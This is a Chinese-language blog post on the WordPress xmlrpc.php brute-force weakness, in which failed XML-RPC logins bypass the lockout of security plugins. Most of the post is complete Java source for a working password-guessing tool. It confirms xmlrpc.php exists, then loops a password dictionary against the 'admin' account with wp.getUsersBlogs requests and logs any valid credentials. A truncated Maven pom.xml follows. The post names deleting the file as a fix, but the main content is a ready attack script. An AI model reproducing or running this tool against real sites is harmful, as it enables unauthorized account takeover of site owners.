Wordpress xmlrpc.php暴力破解漏洞

Wordpress xmlrpc.php暴力破解漏洞

wordpress是很流行的开源博客，它提供远程发布文章的方法，就是使用跟路径的xmlrpc.php这个文件，最近爆出xmlrpc漏洞，漏洞原理是通过xmlrpc进行认证，即使认证失败，也不会被Wordpress安装的安全插件记录，所以不会触发密码输错N次被锁定的情况。因此就可能被暴力破解，如果密码又是弱口令的话，就相当危险了。最简单的解决办法，就是删除xmlrpc.php这个文件。闲来无事，用java写了暴力破解的脚本，其实就是拿着各种用户名、密码去不断调用xmlrpc.phpp这个文件，检测认证结果，很简单。只为娱乐，暴力破解的事情，大家慎重。

Xmlrpc.java源码如下：

    package com.yeetrack.security.wordpress;

    import org.apache.http.client.ClientProtocolException;
    import org.apache.http.client.config.RequestConfig;
    import org.apache.http.client.methods.CloseableHttpResponse;
    import org.apache.http.client.methods.HttpGet;
    import org.apache.http.client.methods.HttpPost;
    import org.apache.http.entity.StringEntity;
    import org.apache.http.impl.client.CloseableHttpClient;
    import org.apache.http.impl.client.HttpClients;
    import org.apache.http.util.EntityUtils;
    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;
    import org.testng.annotations.Test;

    import java.io.*;

    /**
     * Created by victor wang on 2014/8/2.
     * 利用wordpress xmlrpc漏洞，暴力破解密码
     */
    public class Xmlrpc
    {
        private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";
        RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)
                .setSocketTimeout(4000).build();
        private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);
        private CloseableHttpClient httpClient = HttpClients.custom()
                .setUserAgent(userAgent)
                .setDefaultRequestConfig(requestConfig)
                .build();

        /**
         * 校验域名是否存在xmlrpc.php这个文件
         */
        private boolean checkXmlRpcFile(String domain)
        {
            domain = wrapperUrl(domain);
            if(domain==null)
                return false;
            HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php");
            get.addHeader("User-Agent", userAgent);
            CloseableHttpResponse response = null;
            String resultString = null;
            try {
                response = httpClient.execute(get);
                if(null == response || response.equals(""))
                    return false;
                resultString = EntityUtils.toString(response.getEntity());
            } catch (IOException e) {
                e.printStackTrace();
            }

            return resultString.contains("XML-RPC server accepts POST requests only.");
        }

        /**
         * 暴力尝试
         */
        private boolean forceLogin(String username, String password, String url)
        {
            //尝试登录
            HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php");
            post.addHeader("User-Agent", userAgent);
            String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall>  <methodName>wp.getUsersBlogs</methodName>  <params>   <param><value>"+username+"</value></param>   <param><value>"+password+"</value></param>  </params></methodCall>";
            StringEntity entity = null;
            try {
                entity = new StringEntity(xmlString);
                post.setEntity(entity);
                CloseableHttpResponse response = httpClient.execute(post);
                String loginResult = EntityUtils.toString(response.getEntity());
                if(null== loginResult || loginResult.equals(""))
                    return false;
                if(loginResult.contains("isAdmin")) {
                    logger.info(url + "登录成功，userename--->" + username + "  password--->" + password);
                    return true;
                }
            } catch (UnsupportedEncodingException e) {
                e.printStackTrace();
            } catch (ClientProtocolException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }

            return false;
        }
        /**
         * 净化url，去掉http://或者末尾的path
         */
        private String wrapperUrl(String url)
        {
            if(null == url || url.equals(""))
                return null;
            if(url.startsWith("http://"))
                url = url.substring(7);
            if(url.contains("/"))
                url = url.substring(0, url.indexOf("/"));
            return url;
        }

        /**
         * 破解
         */
        @Test
        public void test()
        {
            String url = "http://somewordpress.com/xmlrpc.php";
            if(!checkXmlRpcFile(url)) {
                logger.info(url+"--->不存在xmlrpc漏洞");
                return;
            }
            File file = new File("src/main/resources/1pass00.txt"); //密码字典，这个网上一堆一堆的，或者自己生成也可


            try {
                FileReader fileReader = new FileReader(file);
                BufferedReader bufferedReader = new BufferedReader(fileReader);
                String line = null;
                int count = 1;
                while ((line = bufferedReader.readLine()) != null) {
                    System.out.println("" + count + "  " + line);
                    if(forceLogin("admin", line, url))
                        break;
                    count++;
                    //Thread.sleep(500);
                }
            } catch (Exception e) { e.printStackTrace(); }

        }
    }

项目使用maven管理，使用了apache的httpclient和log4j，pom.xml代码如下：

    <?xml version="1.0" encoding="UTF-8"?>
    <project xmlns="http://maven.apache.org/POM/4.0.0"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>

        <groupId>com.yeetrack.security</groupId>
        <artifactId>wordpress-xmlrpc</artifactId>
        <version>1.0-SNAPSHOT</version>

继续阅读-->